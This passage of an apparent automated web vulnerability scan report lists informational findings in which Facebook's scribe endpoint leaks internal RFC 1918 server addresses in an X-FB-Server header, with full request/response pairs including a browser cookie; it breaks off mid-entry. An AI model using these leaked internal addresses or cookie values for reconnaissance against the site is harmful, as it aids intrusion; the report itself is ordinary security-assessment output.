Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.195.132

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1519%2C%22baseline_elapsed%22%3A1698%7D&asyncSignal=345 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.195.132
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.600. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.7.49

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1185%2C%22baseline_elapsed%22%3A1230%7D&asyncSignal=1307 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac8453ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.7.49
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.601. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.213.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1502%2C%22baseline_elapsed%22%3A1666%7D&asyncSignal=8666 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.213.57
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.602. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.128.37

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1539%2C%22baseline_elapsed%22%3A1521%7D&asyncSignal=9733 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.128.37
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.603. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.51

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1823%2C%22baseline_elapsed%22%3A1824%7D&asyncSignal=3993 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.235.51
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.604. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.155.109

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1360%2C%22baseline_elapsed%22%3A1359%7D&asyncSignal=2064 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7876fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.155.109
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:20 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.605. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.237.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1620%2C%22baseline_elapsed%22%3A1647%7D&asyncSignal=3489 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.237.50
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:30 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.606. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.83.27

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1191%2C%22baseline_elapsed%22%3A1179%7D&asyncSignal=2271 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13f69d6fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.83.27
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.607. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.244.39

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1230%2C%22baseline_elapsed%22%3A1126%7D&asyncSignal=9262 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fc8772c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.244.39
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.608. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.228.117

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1229%2C%22baseline_elapsed%22%3A1263%7D&asyncSignal=2339 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25fc7b33c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.228.117
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:56 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.609. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.116.53

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1512%2C%22baseline_elapsed%22%3A1531%7D&asyncSignal=7071 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0633434%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.116.53
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:47 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.610. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.120.25

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A187%2C%22baseline_elapsed%22%3A187%7D&asyncSignal=6642 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd42320c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.120.25
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.611. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.101.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1231%2C%22baseline_elapsed%22%3A1172%7D&asyncSignal=6133 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340728c14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.101.50
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.612. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.195.59

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1563%2C%22baseline_elapsed%22%3A2245%7D&asyncSignal=9412 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.195.59
X-Cnection: close
Date: Thu, 16 Jun 2011 18:32:39 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.613. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.89.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1655%2C%22baseline_elapsed%22%3A1656%7D&asyncSignal=3604 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.89.40
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:11 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.614. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.92.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1224%2C%22baseline_elapsed%22%3A1224%7D&asyncSignal=4305 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df652b1054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.92.34
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.615. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.102.33

Request

